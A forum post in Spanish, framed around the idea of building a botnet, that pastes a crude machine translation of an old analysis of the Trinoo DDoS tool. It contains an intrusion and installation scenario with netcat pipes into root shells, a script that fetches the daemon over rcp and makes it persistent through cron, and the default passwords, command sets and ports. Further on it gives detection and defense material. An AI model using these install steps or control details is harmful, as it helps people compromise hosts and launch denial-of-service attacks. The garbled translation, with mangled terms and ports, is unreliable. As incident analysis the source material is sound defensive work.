Mmnnn un Botnet, es posible, para los que anden x ahi
http://www.cert.org/incident_notes/IN-99-04.htmly Si tiene ganas de leer les dejo algo:
El proyecto del DOS "Trinoo" denegación de servicio de herramienta de ataque...tiene sus añitos pero es util como para ver de que estamos hablando.
Ataque escenario
Una instalación típica podría ser algo como esto.
1). Una cuenta de robo se configura como un depósito de pre-compilados
versiones de las herramientas de detección, el ataque (es decir, explotar búfer desbordamiento)
herramientas, kits de raíz y sniffers, demonio Trinoo y programas de maestría,
listas de servidores vulnerables y los anfitriones previamente comprometido, etc
normalmente sería un gran sistema con muchos usuarios, uno con poco
la supervisión administrativa, y en una conexión de gran ancho de banda para una rápida
transferencia de archivos.
2). Una exploración se lleva a cabo de grandes cadenas de bloques de la red para identificar
objetivos potenciales. Objetivos serían los sistemas que ejecutan varios
servicios que se sabe que la seguridad de desbordamiento de búfer explotable de forma remota
errores, como wu-ftpd, los servicios de RPC para "CMSD", "statd",
"Ttdbserverd", "AMD", sistemas operativos, etc siendo blanco parecen
ser principalmente Sun Solaris 2.xy Linux (debido a la disponibilidad
de rastreadores de la red y "rootkits" para ocultar las puertas traseras, etc),
pero las cuentas robadas en cualquier arquitectura se puede utilizar para almacenar en caché las herramientas
y los archivos de registro.
3). Una lista de los sistemas vulnerables se utiliza para crear un script que
lleva a cabo la hazaña, crea un shell de comandos se ejecuta en la raíz
cuenta que escucha en un puerto TCP (normalmente 1524/tcp, el
"Ingreslock" puerto de servicio), y se conecta a este puerto para confirmar la
el éxito de la hazaña. En algunos casos, un mensaje de correo electrónico es
enviado a una cuenta en un servicio de correo web gratuito basado para confirmar que
sistemas han sido comprometidos.
El resultado es una lista de "propiedad" de los sistemas están listos para la creación de
puertas traseras, sniffers, o los demonios Trinoo o maestros.
4). De esta lista de sistemas comprometidos, los subgrupos con la deseada
arquitectura son elegidos por la red Trinoo. Binarios precompilados
del demonio Trinoo se crean y se almacenan en una cuenta robada
algún lugar de Internet.
5). Un script se ejecuta entonces que tiene esta lista de "propiedad" de los sistemas y
produce una nueva secuencia de comandos para automatizar el proceso de instalación,
funcionamiento de cada instalación en el fondo para un máximo de multitarea.
Este script utiliza "netcat" ("NC") a la tubería de un script de shell a la raíz
shell escuchando, en este caso, el puerto 1524/tcp:
-------------------------------------------------- -------------------------
. / Trin.sh | nc 128.aaa.167.217 1524 y
. / Trin.sh | nc 128.aaa.167.218 1524 y
. / Trin.sh | nc 128.aaa.167.219 1524 y
. / Trin.sh | nc 128.aaa.187.38 1524 y
. / Trin.sh | nc 128.bbb.2.80 1524 y
. / Trin.sh | nc 128.bbb.2.81 1524 y
. / Trin.sh | nc 128.bbb.2.238 1524 y
. / Trin.sh | nc 128.ccc.12.22 1524 y
. / Trin.sh | nc 128.ccc.12.50 1524 y
. . .
-------------------------------------------------- -------------------------
El guión "trin.sh", cuya producción se canaliza a estos sistemas,
se ve así:
-------------------------------------------------- -------------------------
echo "rcp 192.168.0.1: hoja de / usr / sbin / rpc.listen"
echo "echo rcp se realiza binario en movimiento"
echo "chmod + x / usr / sbin / rpc.listen"
echo "echo el lanzamiento Trinoo"
echo "/ usr / sbin / rpc.listen"
echo "echo \ * \ * \ * \ * \ * / usr / sbin / rpc.listen> cron"
echo "crontab cron"
echo "echo en marcha"
echo "salida"
-------------------------------------------------- -------------------------
Según la frecuencia con archivos crontab se controlan, o si son
utiliza en absoluto, esto puede ser detectado fácilmente. Si cron no se utiliza en todos los
de este usuario (generalmente root), puede que no sea detectado.
Otro método fue presenciado por lo menos en un sistema, donde el
demonio fue nombrado "xterm", y se comenzó a usar un script (llamado "C" en la
el sistema en el que se encontró) que contenga:
-------------------------------------------------- -------------------------
cd / var/adm/.1
PATH =.: $ PATH
export PATH
xterm 1> / dev / null 2> & 1
-------------------------------------------------- -------------------------
Se supone que esto implicaría una forma de ejecutar este script en la demanda
para configurar la red Trinoo.
Incluso formas más sutiles de tener demonios Trinoo / maestros están a la espera de
ejecución en un momento dado son fáciles de imaginar (por ejemplo, UDP o ICMP
cliente / servidor basada conchas, como Loki (ver Apéndice C), los programas de
que despiertan periódicamente y abrir una escucha puerto TCP o UDP, etc)
El resultado de esta automatización es la capacidad de los atacantes para crear
la negación de la red de servicios, en los sistemas dispersos, cuya verdadera
los propietarios ni siquiera saben que son fuera de su control, en un tiempo muy corto
marco.
6). Opcionalmente, un "rootkit" instalado en el sistema para ocultar la
presencia de programas, archivos y conexiones de red. Esto es más
importante en el sistema principal, ya que estos sistemas son fundamentales para el
Trinoo red. (Cabe señalar que en muchos casos, los maestros han
ha creado en Internet Proveedores de Servicios huéspedes primarios nombre del servidor,
que normalmente tienen el tráfico de paquetes muy altos y grandes
número de conexiones TCP y UDP, que efectivamente ocultar
Trinoo relacionados con el tráfico o actividad, y probablemente no ser detectados.
(El hecho de que estos son los servidores primarios nombre también tienden a hacer
los propietarios menos probable que el sistema de la Internet cuando
informes comienzan a salir sobre la negativa de sospecha de servicios relacionados
actividad.)
Kits de raíz también se utiliza en sistemas que ejecutan rastreadores que, a lo largo de
con programas como "caza" (TCP / IP de secuestro de sesión de herramientas) se utilizan para
madriguera más en otras redes directamente, en lugar de a través de
búfer remoto explota invadido (por ejemplo, para encontrar los sitios que crear un fichero nuevo
depósitos, etc)
Para más información sobre "rootkits" y algunas maneras de conseguir alrededor de ellos, consulte:
http://staff.washington.edu/dittrich/misc/faqs/rootkits.faqLa red: atacante (s) -> maestro (s) -> demonio (s) - víctima> (s)
-------------------------------------------------- ----------
La red Trinoo se compone de un servidor maestro ("master.c") y el
Trinoo demonio ("ns.c"). Una red Trinoo se vería así:
+----------+ +----------+
| Atacante | | atacante |
+----------+ +----------+
| |
. . . --+------+---------------+------+----------------+ -. . .
| | |
| | |
+----------+ +----------+ +----------+
| Principal | | maestro | | master |
+----------+ +----------+ +----------+
| | |
| | |
. . . ---+------+-----+------------+---+--------+------- -----+-+--. . .
| | | | |
| | | | |
+--------+ +--------+ +--------+ +--------+ +--------+
| Demonio | | demonio | | demonio | | demonio | | demonio |
+--------+ +--------+ +--------+ +--------+ +--------+
El atacante (s) de control de uno o más servidores "maestro", cada uno de ellos
puede controlar muchos "demonios" (conocido en el código como "Bcast", o
"Emisión" hosts.) Los demonios son las instrucciones para coordinar una
paquete de un ataque basado en contra de uno o más sistemas de la víctima.
Todo lo que entonces se necesita es la capacidad de establecer una conexión TCP
al maestro acoge con "telnet" y la contraseña para el maestro
servidor para poder librar masivo, la negación coordinada, de servicio
ataques.
Puertos de comunicación
-------------------
Atacante Master (s): 27665/tcp
Maestro de demonio (s): 27444/udp
Daemon al Maestro (s): 31335/udp
Control remoto del maestro Trinoo se lleva a cabo a través de un TCP
conexión al puerto 27665/tcp. Después de la conexión, el usuario debe dar
la contraseña correcta ("betaalmostdone"). Si otra conexión se realiza
en el servidor, mientras que alguien ya ha sido autenticado, aparece una advertencia
que se les envió con la dirección IP de la máquina que se conecta (aparece
hay un error que los informes de las direcciones IP incorrecta, pero es una advertencia
siendo comunicada). Esto, sin duda, se fijará el tiempo y
a continuación, dar a los atacantes el tiempo para limpiar y cubrir sus huellas.
Comunicación de la maestra Trinoo a los demonios es a través de paquetes UDP
en el puerto 27444/udp. Las líneas de comandos son líneas separadas por espacios de la
forma:
arg1 arg2 contraseña
La contraseña por defecto para los comandos es "l44adsl", y sólo las líneas de comandos
que contienen la subcadena "L44" se procesan.
Comunicación de los demonios Trinoo y el maestro es a través de UDP
paquetes en el puerto 31335/udp.
Cuando el demonio se inicia, envía un principio "* HOLA *" al maestro,
que mantiene una lista de demonios activos que controla (de paquetes
capturado usando "sniffit"):
UDP de paquetes ID (from_IP.port-to_IP.port): 192.168.0.1.32876-10.0.0.1.31335
45 E 00. 00. # 23 B1. 5D] 40 @ 00. F8. 11. B9. 27. C0. A8. 00. 01.
0A. 00. 00. 01. 80. 6C 7A z l 67 g 00. 0F. 06. D4. 2A * 48 H 45 E L 4C
4C 4F L O 2A *
Si el maestro envía un Trinoo "png" comando a un demonio en el puerto
27444/udp, el demonio le responderá con el servidor que acaba de enviar el "png"
comando mediante el envío de la cadena "Pong" en el puerto 31335/udp:
UDP de paquetes ID (from_IP.port-to_IP.port): 10.0.0.1.1024-192.168.0.1.27444
45 E 00. 00. 27 '1A. AE. 00. 00. 40 @ 11. 47 G D4. 0A. 00. 00. 01.
C0. A8. 00. 01. 04. 00. 6B k 34 4 00. 13. 2F / B7. 70 p 6E n 67 g 20
6C l 34 4 34 4 61 a 64 d 73 s l 6C
UDP de paquetes ID (from_IP.port-to_IP.port): 192.168.0.1.32879-10.0.0.1.31335
45 E 00. 00. 20 13. 81. 40 @ 00. F8. 11. 57 W 07. C0. A8. 00. 01.
0A. 00. 00. 01. 80. 6F o 7A z 67 g 00. 0C. 4E 4F N 24 $ 50 P O N G 47 4E
Protección por contraseña
Tanto el capitán y los demonios están protegidos por contraseña para evitar
los administradores de sistemas (u otros grupos de hackers) de ser capaz de tomar
control de la red Trinoo. Estas contraseñas se crypt () de estilo
contraseñas. Se utilizan de forma simétrica, donde el encriptado
contraseña está compilado en el maestro y los demonios y se utiliza para comparar
en contra de la versión en texto claro de la contraseña que se envían a través de la
de red (la versión actual no cifra la sesión actual, por lo que el
texto sin cifrar las contraseñas están expuestos en el tránsito y el control maestro
sesiones están sujetas a highjacking sesión TCP).
Cuando se proceda a ejecutar, el demonio maestro produce un mensaje, a la espera
una contraseña. Si la contraseña correcta no es recibido, el programa
salidas. Si la contraseña de la debida atención, el proceso anuncia su
ejecución, los tenedores de seguir funcionando en segundo plano, y se cierra:
#. / Master
? wrongpassword
#
. . .
#. / Master
? gOrave
Trinoo v1.07d2 + f3 + c [26 de septiembre 1999:10:09:24]
#
Del mismo modo, cuando se conecta al puerto de mando a distancia (por defecto
27665/tcp), también debe dar una contraseña:
atacante $ telnet 10.0.0.1 27.665
Tratando 10.0.0.1
Conectado a 10.0.0.1
Carácter de escape es'^]'.
kwijibo
Conexión cerrada por host extranjeros.
. . .
atacante $ telnet 10.0.0.1 27.665
Tratando 10.0.0.1
Conectado a 10.0.0.1
Carácter de escape es'^]'.
betaalmostdone
Trinoo v1.07d2 + f3 + c.. [rpm8d/cb4Sx /]
Trinoo>
Ciertos comandos enviados a los demonios Trinoo por el maestro también
protegido por contraseña. Esta contraseña se envía como texto sin cifrar entre el
maestro y los demonios.
Las contraseñas por defecto son:
"L44adsl" Trinoo demonio contraseña
"GOrave" Trinoo maestro de arranque del servidor ("?" Del sistema)
"Betaalmostdone" Trinoo maestro remoto contraseña de la interfaz
"Killme" Trinoo contraseña maestra para controlar "mdie" comando
Maestro de los comandos
Soporta los siguientes comandos:
mueren Apague el maestro.
dejar de fumar Cierre la sesión del maestro.
mtimer N Ajuste del temporizador de denegación de N segundos. N puede ser entre 1 y 1999
segundos. Si N es <1, por defecto es 300. Si N
es> 2000, el valor predeterminado es 500.
IP dos denegación de la dirección IP especificada. Un comando ("AAA l44adsl
IP ") es enviado a cada host Bcast (es decir, demonios Trinoo)
diciéndoles que de denegación de la dirección IP especificada.
mdie pasar Desactivar todos los hosts Bcast, si la contraseña correcta
especificado. Se envía un comando ("D1E l44adsl") a cada
Anfitrión bcast les está diciendo a cerrar. Un separado
es necesaria la contraseña para este comando.
mping Enviar un comando PING ("png l44adsl") para todos los activos
Bcast anfitrión.
mdos <ip1:ip2:ip3>
Múltiples DoS. Envía un múltiplo de comandos de DOS
("Xyz l44adsl 123: IP1: IP2: IP3") a cada host BCAST.
información de la versión de impresión y recopilar información, por ejemplo:
Este es el "Trinoo" AKA denegación de Proyecto versión del servidor maestro v1.07d2 + f3 + c
Compilado 15:08:41 16 de agosto 1999
msize Establecer el tamaño del búfer para los paquetes enviados durante los ataques de denegación de servicio.
anfitrión nslookup Hacer una búsqueda de servicio de nombres de los host de
la perspectiva del sistema en el que el maestro
servidor está en ejecución.
killdead intentos de eliminar a todos los hosts Bcast muertos, en primer lugar
el envío de todos los hosts conocidos Bcast un comando ("shi l44adsl")
que hace que los demonios activos para responder con la inicial
"* HOLA *" cadena, entonces cambia el nombre del archivo Bcast (con
extensión "-b") por lo que se re-inicia cuando el
"* HOLA *" se reciben los paquetes.
usebackup Cambie al archivo Bcast copia de seguridad creada por el
"Killdead" de comandos.
bcast Lista de todos los hosts Bcast activo.
ayuda [cmd] Dar una lista (parcial) de los comandos, o una breve
descripción del comando "cmd" si se ha especificado.
mstop intentos para detener un ataque DoS (no está implementado, pero
que figuran en el comando de ayuda).
Comandos demonio
El demonio Trinoo soporta los siguientes comandos:
IP pase aaa denegación de la dirección IP especificada. Envía paquetes UDP al azar
(0 a 65534) UDP a las direcciones IP especificadas para
un período de tiempo (por defecto es 120 segundos, o 1 a 1999
segundos según lo establecido por el "BBB" de comandos.) El tamaño de la
paquetes es la fijada por el "RSZ" de comandos, o la falta de
tamaño de 1000 bytes.
bbb pasar N Establece el límite de tiempo (en segundos) para los ataques de denegación de servicio.
pasar shi Envía la cadena "* HOLA *" a la lista de servidores maestros
compilados en el programa en el puerto 31335/udp.
png pasar Envía la cadena "Pong" a la maestra que emitió la
el comando en el puerto 31335/udp.
D1E pasar Apague el demonio Trinoo.
RSZ N Establecer el tamaño del buffer para ataques de denegación de N bytes.
(El demonio Trinoo simplemente malloc () SA buffer con este
tamaño, y luego envía el contenido sin inicializar de la
tampón durante un ataque.)
xyz pasar 123: IP1: IP2: ip3
Múltiples DoS. Hace lo mismo que el "aaa"
comando, pero por múltiples direcciones IP.
Podría ser coincidencia, pero yo le daré el autor algo de crédito y
asumir que tres comandos carta fueron elegidos para que no se muestran en
el binario como cadenas visibles en el comportamiento predeterminado de
CUERDAS (1). Debe utilizar el "- bytes = 3" opción de GNU CUERDAS (1) a
ver los comandos:
# Cuerdas - bytes = 3 ns | tail -15
enchufe
atar
recvfrom
L44
% S% s% s
aIf3YWfOhw.V.
aaa
bbb
shi
png
PONG
D1E
RSZ
xyz
* Hola *
Las huellas dactilares
El método utilizado para instalar el demonio Trinoo emplea en algunos sistemas
una entrada de crontab para iniciar el demonio de cada minuto. El examen de crontab
archivos ubicaría esta entrada:
* * * * * / Usr / sbin / rpc.listen
El Máster se crea un archivo (por defecto el nombre "...") que contiene la
conjunto de los ejércitos Bcast. Si el comando "killdead" se utiliza, un "shi" comando
se envía a todos los demonios que figuran en "...", que les lleva a enviar el
inicial "* HOLA *" cadena a todos los maestros. La lista actual se cambia el nombre
(Por defecto "...- b ") y una nueva lista se genera, ya que cada restantes
demonio vive envía su "* HOLA *".
El código fuente ("master.c") contiene las siguientes líneas:
. . .
/ * Cripta cifrado con la clave 'aburrido' (edición para hexadecimal no puede obtener la clave fácilmente?) Clave
comentario sin cifrado ... * /
# Define CRYPTKEY "ZsoTN.cq4X31"
Si el programa se ha compilado con CRYPTKEY definido, las direcciones IP de
Anfitriones bcast son encriptados usando el algoritmo de cifrado Blowfish:
# Ls-l ... ...- B
-Rw ------- 1 root root 25 de septiembre 26 14:46 ...
-Rw ------- 1 root root 50 26 de septiembre dos y media de la noche ...- b
# Cat ...
JPbUc05Swk/0gMvui18BrFH /
# Cat ...- b
aE5sK0PIFws0Y0EhH02fLVK.
JPbUc05Swk/0gMvui18BrFH /
Suponiendo que no hay "root kit" presente para ocultar procesos, el maestro
servidor muestra las huellas digitales de la red después de socket (por supuesto, la
nombres y ubicaciones de directorio de cualquiera de los programas están sujetos a cambios):
# Netstat-a - inet
Conexiones activas de Internet (servidores y establecidos)
Proto Recv-Q Send-Q Estado Dirección local Dirección
tcp 0 0 *: 27665 *: * LISTEN
. . .
udp 0 0 *: 31335 *: *
. . .
# Lsof | egrep ": 31335 |: 27665"
maestro de 1292 inet raíz 3u * 2460 UDP: 31335
maestro de 1292 inet raíz 4u 2461 TCP *: 27.665 (ESCUCHA)
# Lsof-p 1292
COMANDO USER PID tipo fd el tamaño del dispositivo Nombre de nodo
maestro raíz cwd DIR 1292 3,1 1024 14 356 / tmp / ...
maestro raíz de IDT DIR 1292 3,1 1024 2 /
1292 master raíz txt REG 3,1 30492 14357 / tmp / ... / master
1292 miembros maestro raíz REG 3,1 342.206 28.976 / lib/ld-2.1.1.so
1292 miembros maestro raíz REG 3,1 63 878 29 116 / lib/libcrypt-2.1.1.so
1292 miembros maestro raíz REG 3,1 4.016.683 29.115 / lib/libc-2.1.1.so
maestro raíz 0u Comisión de Derechos Humanos 1292 4,1 2967 / dev/tty1
maestro raíz 1u Comisión de Derechos Humanos 1292 4,1 2967 / dev/tty1
maestro raíz 2u Comisión de Derechos Humanos 1292 4,1 2967 / dev/tty1
maestro de 1292 inet raíz 3u * 2534 UDP: 31335
maestro de 1292 inet raíz 4u 2535 TCP *: 27.665 (ESCUCHA)
Un sistema que está ejecutando un demonio que muestran lo siguiente:
# Netstat-a - inet
Conexiones activas de Internet (servidores y establecidos)
Proto Recv-Q Send-Q Estado Dirección local Dirección
. . .
udp 0 0 *: 1024 *: *
udp 0 0 *: 27444 *: *
. . .
# Lsof | egrep ": 27444"
ns 1316 3u raíz inet 2502 UDP *: 27.444
# Lsof-p 1316
COMANDO USER PID tipo fd el tamaño del dispositivo Nombre de nodo
ns 1316 cwd raíz DIR 3,1 1024 153 694 / tmp / ...
ns 1316 rtd raíz DIR 3,1 1024 2 /
ns raíz txt REG 1316 3,1 6156 153 711 / tmp / ... / ns
ns 1.316 miembros raíz REG 3,1 342 206 28 976 / lib/ld-2.1.1.so
ns 1.316 miembros raíz REG 3,1 63 878 29 116 / lib/libcrypt-2.1.1.so
ns 1.316 miembros raíz REG 3,1 4.016.683 29.115 / lib/libc-2.1.1.so
ns 1,316 raíz 0u CHR 4,1 2,967 / dev/tty1
ns 1316 1u raíz CHR 4,1 2,967 / dev/tty1
ns 1,316 raíz 2u CHR 4,1 2,967 / dev/tty1
ns 1316 3u raíz inet 2502 UDP *: 27.444
ns raíz 4u 1316 inet 2503 UDP *: 1024
Defensas
Por supuesto, la mejor defensa es evitar las intrusiones y el nivel de la raíz
compromiso de sus sistemas, en primer lugar, por lo que no habría
sistemas en los que la instalación de Trinoo maestro / demonios. En un mundo ideal,
todos los sistemas que ser parcheado, aseguró, control, detección de intrusos
sistemas y servidores de seguridad estarán disponibles para detectar y rechazar los paquetes,
y me gustaría ser un multi-millonario viviendo seis meses del año en una playa
mansión en Bali, y seis meses en los Alpes franceses. En el mundo real,
esto no es una opción (al menos no en un futuro previsible.)
En cambio, la red ya puede tener varios demonios Trinoo funcionamiento
y listo para otros sistemas DOS en cualquier momento. Entonces, ¿cómo pueden ser
detectado o discapacitado?
Debido a que los programas de uso de alta números de puertos UDP, tanto para la comunicación
y el ataque, será muy difícil (o imposible) para bloquearlo
sin romper los programas que utilizan UDP en los puertos de alta numerada.
El método más sencillo para detectar la presencia de los maestros Trinoo o demonios
(Como el código existe en la actualidad) puede ser la de supervisar todos los paquetes UDP en el
Ethernet compartido segmentos y buscar los signos reveladores de
la comunicación entre el maestro (s) y el demonio (s) como se describe en otras partes de
este trabajo. (Cambia impediría ver los paquetes UDP que no están
asociado con la dirección MAC de la red del host de monitoreo de
de la interfaz.) Lamentablemente, esto sólo se produciría durante un ataque,
que probablemente llegaría a ser conocido por la degradación del rendimiento de la red y / o
informes de denegación de servicio ataques de los sitios de las víctimas.
Si un sistema se sospecha de albergar un demonio Trinoo que se activa
ataque, la salida de la versión de Solaris "armadura" del programa en el funcionamiento
demonio se mostrará una salida como la siguiente:
getmsg (3, 0xEFFFF830, 0xEFFFF83C, 0xEFFFF81C) = 0
getmsg (3, 0xEFFFF830, 0xEFFFF83C, 0xEFFFF81C) (sleeping. ..)
getmsg (3, 0xEFFFF830, 0xEFFFF83C, 0xEFFFF81C) = 0
tiempo () = 938 385 467
abierto ("/ dev / udp", O_RDWR) = 5
ioctl (5, I_PUSH, "sockmod") = 0
ioctl (5, I_STR, 0xEFFFF748) = 0
ioctl (5, I_SETCLTIME, 0xEFFFF7FC) = 0
ioctl (5, I_SWROPT, 0x00000002) = 0
sigprocmask (SIG_SETMASK, 0xEFFFF7EC, 0xEFFFF7DC) = 0
ioctl (5, I_STR, 0xEFFFF660) = 0
sigprocmask (SIG_SETMASK, 0xEFFFF7DC, 0xEFFFF7B8) = 0
sigprocmask (SIG_BLOCK, 0xEFFFF548, 0xEFFFF5C0) = 0
ioctl (5, I_STR, 0xEFFFF548) = 0
sigprocmask (SIG_SETMASK, 0xEFFFF5C0, 0x00000000) = 0
putmsg (5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0
tiempo () = 938 385 467
putmsg (5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0
tiempo () = 938 385 467
putmsg (5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0
tiempo () = 938 385 467
putmsg (5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0
tiempo () = 938 385 467
putmsg (5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0
tiempo () = 938 385 467
putmsg (5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0
tiempo () = 938 385 467
putmsg (5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0
tiempo () = 938 385 467
putmsg (5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0
tiempo () = 938 385 467
putmsg (5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0
tiempo () = 938 385 467
putmsg (5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0
tiempo () = 938 385 467
. . .
El tráfico en la red durante un ataque contra un solo objetivo
(Como se ve por "tcpdump") se vería así:
# Tcpdump host IP 192.168.0.1
. . .
15:40:08.491782 10.0.0.1.1024> 192.168.0.1.27444: udp 25
15:40:08.574453 192.168.0.1.32885> 216.160.XX.YY.16838: udp 4 (DF)
15:40:08.576427 192.168.0.1.32885> 216.160.XX.YY.5758: udp 4 (DF)
15:40:08.579752 192.168.0.1.32885> 216.160.XX.YY.10113: udp 4 (DF)
15:40:08.583056 192.168.0.1.32885> 216.160.XX.YY.17515: udp 4 (DF)
15:40:08.600948 192.168.0.1.32885> 216.160.XX.YY.31051: udp 4 (DF)
15:40:08.604943 192.168.0.1.32885> 216.160.XX.YY.5627: udp 4 (DF)
15:40:08.610886 192.168.0.1.32885> 216.160.XX.YY.23010: udp 4 (DF)
15:40:08.614202 192.168.0.1.32885> 216.160.XX.YY.7419: udp 4 (DF)
15:40:08.615507 192.168.0.1.32885> 216.160.XX.YY.16212: udp 4 (DF)
15:40:08.616854 192.168.0.1.32885> 216.160.XX.YY.4086: udp 4 (DF)
15:40:08.618827 192.168.0.1.32885> 216.160.XX.YY.2749: udp 4 (DF)
15:40:08.623480 192.168.0.1.32885> 216.160.XX.YY.12767: udp 4 (DF)
15:40:08.625458 192.168.0.1.32885> 216.160.XX.YY.9084: udp 4 (DF)
15:40:08.628764 192.168.0.1.32885> 216.160.XX.YY.12060: udp 4 (DF)
15:40:08.632090 192.168.0.1.32885> 216.160.XX.YY.32225: udp 4 (DF)
. . .
Debilidades
La primera debilidad es que la cripta () las contraseñas cifradas, y algunos
mensajes y devuelven cadenas, son visibles tanto en el maestro y el demonio
imágenes binarias.
Esto te permitirá determinar si usted ha encontrado un maestro o un
demonio, determinar si las contraseñas son los valores predeterminados se muestran en este
papel o no, y, potencialmente, permite explotar la contraseña
debilidades para tomar el control de algunos / todos los de la red Trinoo mismo.
Si el código fuente ha sido modificada (que sin duda, por más inteligente
los atacantes), que tendría que romper las contraseñas, o utilizar un
editor hexadecimal / ASCII (por ejemplo, "xxd", parte de la suite editor VIM) y
cambio en la imagen binaria, con el fin de, por ejemplo, ejecutar el
maestro para recuperar la lista de demonios.
Si la fuente no tiene, se puede determinar este hecho mediante la observación de la
cadenas incluidas en el programa binario:
-------------------------------------------------- ----------------------------
# Cuerdas - ns
. . .
enchufe
atar
recvfrom
% S% s% s
aIf3YWfOhw.V. <=== Crypt () contraseña cifrada "l44adsl"
PONG
* Hola *
. . .
# Cuerdas - master
. . .
--- V
v1.07d2 + f3 + c
Trinoo% s
l44adsl <=== versión de texto claro de la contraseña del demonio
calcetín
0nm1VNMXqRMyM <=== crypt () contraseña cifrada "gOrave"
10:09:24
26 de septiembre 1999
Trinoo% s [% s:% s]
atar
leer
* Hola *
ZsoTN.cq4X31 <=== CRYPTKEY
aburrido
Bcast NUEVO -% s
PONG
PONG% d recibido de% s
Advertencia: La conexión desde% s
beUBZbLtK7kkY <=== crypt () contraseña cifrada "betaalmostdone"
Trinoo% s.. [rpm8d/cb4Sx /]
. . .
DoS: el uso de: dos <ip>
DoS: paquetización% s.
aaa% s% s
mdie
ErDVt6azHrePE <=== crypt (password) encriptados para "mdie" comando
mdie: la desactivación de Bcasts.
D1E% s
mdie: contraseña?
. . .
A continuación, y más vulnerable, es la contraseña del demonio, que viaja por el
la red en forma de texto claro. Suponiendo que conoce el puerto UDP en el que el
maestro se comunica con el cliente, usted puede capturar la contraseña con
"Sniffit", "ngrep", "tcpdump", o cualquier otro programa de monitoreo de red capaz
de mostrar datos en paquetes UDP cargas (véase el Apéndice A para una muestra
sesión registrada con "ngrep").
Por ejemplo, aquí está el "png" comando se envía al demonio Trinoo
como se ve por "sniffit":
UDP de paquetes ID (from_IP.port-to_IP.port): 10.0.0.1.1024-192.168.0.1.27444
45 E 00. 00. 27 '1A. AE. 00. 00. 40 @ 11. 47 G D4. 0A. 00. 00. 01.
C0. A8. 00. 01. 04. 00. 6B k 34 4 00. 13. 2F / B7. 70 p 6E n 67 g 20
6C l 34 4 34 4 61 a 64 d 73 s l 6C
Como se mencionó anteriormente, el "mdie" comando en el maestro es Trinoo
protegido por contraseña en el propio maestro. Hay un par de maneras
para atacar a este.
Si puede determinar la cripta () cadena de cifrado con el Unix
"Cadenas" de comandos, usted podría (potencialmente) usar una contraseña que se agrieta
de servicios públicos, tales como "crack", y lo rompiera (ver Apéndice C). Esto puede
tomar mucho tiempo si la contraseña fue bien escogido, pero es factible
(Y el "killme" la contraseña de la "mdie" comando estaba roto en menos
de 30 segundos en un Pentium II).
Usted podría tratar de olfatear la contraseña en el cable entre el atacante
y el maestro, pero se supone que este comando no sería utilizado por la
Los atacantes a menudo, en todo caso, ya que quieren los demonios que se activa
cuando sea necesario para un ataque.
Es posible que tenga más suerte olfateando el password daemon, ya que es
necesarios para la mayoría de los comandos. Esto se puede hacer ya sea en el de demonio o
red de maestría (por lo general son redes totalmente diferente.) Es
debe ser más fácil de lograr en la red de los demonios, ya que hay
demonios mucho más que maestros. Dado que muchos de los maestros han sido
se encuentran en servidores de nombres primarios, es de suponer que habría más tráfico
el alto número de redes de puertos UDP que contiene maestros que en
redes que contienen los demonios (fuera de la duración de la negación de
los ataques del servicio, lo que es.) Por otra parte es probable encontrar varias
demonios en un sitio determinado, posiblemente como resultado de la detección de la
comprometer el sistema original.
Una vez que haya localizado un demonio, que también han encontrado la lista de IP
direcciones de los maestros (el uso "cadenas" para verlos.) Usted debe
inmediatamente en contacto con estos sitios y convencerlos para inspeccionar de cerca la
sistema de señales de intrusión, con probabilidades de "root kit" de las instalaciones
hacer esta tarea más difícil, y tratar de coordinar una respuesta.
Después de haber encontrado un maestro, la lista de demonios (que probablemente incluya
anfitriones en muchos otros sitios) se puede obtener por simple identificación de las
archivo que contiene la lista, si no cifrado. Sin embargo, si el archivo es
cifrado, tendrían que descifrar el archivo cifrado Blowfish
utilizando la misma clave en el programa compilado, o tomando el control de
el maestro y el uso de la "bcast" de comandos.
Se ha identificado una sesión de control activo de un maestro, que es
una norma de "telnet" estilo de sesión TCP, se puede secuestrar la sesión
el uso de "cazar" y ejecutar comandos. Al no conocer la "mdie"
orden password, no se podía desactivar todos los demonios directamente, pero
Usted podría utilizar el "bcast de" comando y obtener una lista de todos ellos (que
probablemente querría hacer esto con el "guión" de comandos para generar
una transcripción de la sesión, ya que esto podría ser una lista muy grande).
Una vez que sepas las direcciones de todos los demonios, y el demonio
contraseña (visible en "cadenas" de salida), entonces usted puede enviar el adecuado
cadena de comando en los paquetes UDP a cualquier sospecha de demonio Trinoo (s).
Creación y transmisión de paquetes UDP se puede lograr con
herramientas como LibNet, Spak, la Red de Perl:: Biblioteca RawIP, etc (A Perl
secuencia de comandos con Net:: RawIP llamado "trinot" ha sido desarrollado para
realizar esta tarea. Véase el Apéndice B).
Como la instalación típica del demonio incluye una entrada en el crontab
que ejecuta cada minuto, usted tendría que rociar constantemente su
toda la red para mantener a los demonios de volver a comenzar. (Esto puede ser debido
a errores de programación que causan los demonios se bloquee de vez en cuando, o
se puede derrotar a los administradores de sistemas que simplemente aviso y matar a los
proceso, pero no creo que para buscar una entrada en el crontab que reinicia
el demonio).
Los demonios también se puede encontrar en la red por la inhalación de los datos
parte de los paquetes UDP para las cadenas "* HOLA *" y "Pong", o cualquiera de
el comando propias cadenas para el caso (hasta que la fuente es
modificado para cambiar estas cadenas, por supuesto.) El "ngrep" programa
funciona muy bien para esto:
-------------------------------------------------- ----------------------------
# Ngrep-i-x "* hola * | pong" udp
interfaz: eth0 (192.168.0.200/255.255.255.0)
Filtro: ip y (udp)
partido: * Hola * | pong
. . .
#
U 192.168.0.1:32887 -> 10.0.0.1:31335
2a 48 45 4c 4c 4f 2a * hola *
# # #
U 192.168.0.1:32888 -> 10.0.0.1:31335
50 4e 47 4f PONG
U 192.168.0.3:32815 -> 10.0.0.1:31335
50 4e 47 4f PONG
U 192.168.0.5:32798 -> 10.0.0.1:31335
50 4e 47 4f PONG
. . .
-------------------------------------------------- ----------------------------
Aunque no en las debilidades Trinoo sí, también hay puntos débiles en
la forma en que las redes Trinoo se establezcan.
Como se mencionó anteriormente, algunos sistemas muestran las entradas de crontab utiliza para
iniciar los demonios una vez por minuto. Esto deja una huella evidente
en los archivos crontab.
